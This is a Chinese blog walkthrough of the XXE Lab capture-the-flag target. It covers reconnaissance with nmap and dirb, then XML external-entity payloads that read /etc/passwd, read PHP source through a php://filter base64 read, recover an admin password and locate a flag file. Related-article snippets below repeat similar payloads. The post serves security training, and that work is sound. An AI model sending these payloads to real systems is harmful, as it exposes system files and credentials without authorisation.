XXE Lab渗透测试实战靶场

最新推荐文章于 2024-05-11 21:47:29 发布
最新推荐文章于 2024-05-11 21:47:29 发布
阅读量3k 收藏 5
点赞数 2
分类专栏: 渗透测试 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangpeng999123/article/details/105720790
版权

任务描述:信息收集。

1.   首先查看kali机器IP地址: 10.1.1.91

2.   使用netdiscover扫描本地网络主机:

      # netdiscover -r 10.1.1.0/24

      -r range:扫描给定范围而不是自动扫描。

3.   使用nmap扫描目标ip:

      # nmap -sV -p 1-65535 10.1.1.93 -v

      -sV:探测端口服务版本;

      -p:指定端口;

      -v:显示扫描过程。

      

 

4.   浏览器访问10.1.1.93机器的80端口:

      发现为Apache默认页面,猜测可能存在隐藏目录。

5.   使用dirb扫描10.1.1.93机器目录:

      # dirb http://10.1.1.93

      发现存在robots.txt文件,此文件包含了互联网上的网页信息。

6.   浏览器访问http://10.1.1.93/robots.txt,查看robots.txt文件内容:

      

      发现存在后台管理页面和xxe网站。

7.   访问http://10.1.1.93/xxe/(admin.php 404了)

开始漏洞利用:

1.   既然是XXE靶场,就按照XXE的思路来。利用file协议读取任意文件:

      Payload:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE ANY[

<!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

 <root><name>&xxe;</name><password>123</password></root>

      在响应处直接显示了读取文件的内容,说明是有回显的XXE。

2.   尝试读取出现404的admin.php:

      Payload:  

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE ANY[

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

]>

 <root><name>&xxe;</name><password>123</password></root>

      

      结果被base64加密了,可以放到burpsuite的【Decoder】模块进行解密:

      拿去解密可以得出密码是admin@123:

3.   使用用户名:administhebest,密码:admin@123登录之前的xxe网站,出现提示错误   

4.   可能不是这个网址的用户信息,尝试使用dirb扫描/xxe/目录:

      # dirb http://10.1.1.93/xxe/

      

      发现还存在一个/xxe/admin.php文件。

5.   尝试用刚才的信息登录/xxe/admin.php:

     

      出现‘Here is the flag’,点击发现是个跳转:

6.   依然是404,再次利用之前的思路,修改payload中resource后的文件名即可:

      

7.   继续拿去base64解码:

      

 

      又是一串base64编码,解码后可以看到flag在/etc/.flag.php文件中:

8. 利用file协议读取文件内容

      得到一串无特征码的PHP webshell:

      

9.   将webshell保存到phpStudy的网站根目录下,开启phpStudy,浏览器访问webshell即可得到flag:

      

 

努力 现在开始
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
八、漏洞原理及利用(5)XXE 笔记和靶场
weixin_45540609的博客
05-08 379
一、XXE XML外部实体攻击(用户输入数据被当做XML实体代码执行,然后利用DTD部分可以通过SYSTEM关键词发起网络请求,从而获得数据) 典型攻击,定义实体必须写在DTD部分 外部实体是TDT部分的一个特殊地方(SYSTEM)可以调用外部文件进行XML文件的规划(可以发起网络请求) 1、XML 一种类似html的语言,用于传输数据,没有被预定义,需要自行定义标签 2、原理 有了XML实体,关键字’SYSTEM’会令XML解析器从URI中读取内容,并允许它在XML文档中被替换。 .
burpsuite靶场——XXE
qq_61768489的博客
12-26 1036
XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期中比较流行,现在开始流行JSON格式的数据了。XML实体是一种表示数据项的方式,比如用实体< and >表示符号,XML用实体来表示XML标签。DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点中声明。
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2221
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
XXE-lab靶场搭建
最新发布
MateSnake的博客
05-11 302
XXE-lab靶场搭建
XXE——针对站点渗透
m0_65544268的博客
07-26 394
对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5先进行base32解码在进行base64解码得到。可以扫描到80端口是开放的,使用的中间件是Apache,以及网站根目录下有哪些文件。同时我们还可以发现flag存在于/flagmeout.php文件中。密码做了一个md5加密,尝试对密码进行md5的解密。输入账号:admin,密码:123,进行抓包。5)访问/etc/.flag.php文件。1)准备我们的bp抓包工具进行抓包。将得到的数据进行base64转码。3)访问admin.php文件。
XXE漏洞
热门推荐
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到...
针对SOAP的渗透测试与防护
01-29
简单对象访问协议(SOAP)是连接或Web服务或客户端和Web服务之间的接口。...图1SOAP操作 它是基于xml语言开发的,它使用Web服务描述语言(WSDL)来生成Web服务之间的接口。如果客户端或用户的独立应用程序想要与Web服务连接...
渗透测试初级面试题(二)
09-15
渗透测试初级面试题(二) 本文档涵盖了渗透测试的多个方面,包括数据库安全、Web 应用安全、身份认证、业务逻辑漏洞等。通过回答十个问题,总结了渗透测试中的一些重要知识点。 首先,问题 1 中提到的是 MySQL ...
渗透测试思维导图下载
11-07
渗透测试是一种模拟黑客攻击行为,以评估计算机网络或应用程序的安全性的技术。它是通过合法的、有控制的手段来发现和识别系统中的弱点,以便于预防和抵御潜在的恶意攻击。在本主题中,我们将深入探讨渗透测试的核心...
渗透测试、信息安全面试题.md
07-23
渗透测试工程师、信息安全工程师面试题,包含xxs、csrf、ssrf、xxe、反序列化漏洞、逻辑漏洞、命令执行漏洞、渗透测试流程等
Webug4.0-XXE/Blind XXE注入
baynk的博客
11-27 1187
0x01 XXE注入 似乎这种基础靶场里面都没有blind xxe,看来得赶紧进入一步学习了。 贴一个基础链接XXE漏洞学习 随便输入啥都行,会出现一段代码。 直接在登陆的地方输入下列xml代码 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///...
XXE漏洞详解(三)——XXE漏洞实际运用
永远是少年
12-23 746
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE漏洞详解(三)——XXE漏洞实际运用。 一、XXE漏洞简介 二、XXE漏洞pikachu靶场介绍 三、XXE漏洞pikachu靶场实战 (一)利用XXE漏洞读取文件 (二)利用XXE漏洞进行内网探测
pikachu靶场 :十三、XXE
qq_43233085的博客
02-02 743
pikachu靶场 :十三、XXE概述XXE 漏洞盲注 概述 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体...
XXE Lab:1题解
weixin_34314962的博客
11-07 771
思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件 80端口检查 其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。构造如下payload,读取页面源码,获得一不知是flag还...
XXE漏洞及Blind XXE练习
Shinpachi8的博客
12-04 4303
XXE漏洞及Blind XXE实例。 详细说明。
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1503
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
XXE靶机
haha1314的博客
08-10 687
一、 收集信息 存活主机 开放端口 存在注入 Post包里面添加 <?xml version=“1.0″ encoding=“UTF-8″?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <root><n...
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API,用于演示和学习xxe漏洞的原理、利用方法和思路。你可以在GitHub上找到该靶场的地址,并直接解压在www路径下进行使用。 在xxe漏洞的利用过程中,可以通过代码进行文件读取、内网探针或攻击内网应用、远程命令执行(RCE)、无回显读取文件等方式来实现攻击目标。同时也可以通过xxe绕过来绕过一些防御措施。 正常回显XXE是最传统的XXE攻击方式,服务器会直接回显信息,从而完成XXE攻击。而报错XXE是指在利用过程中会触发服务器的错误信息回显,进而获取敏感信息。所以,pikachu靶场xxe漏洞提供了一个学习和实践的平台,让人们能够更好地了解和防范xxe漏洞的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值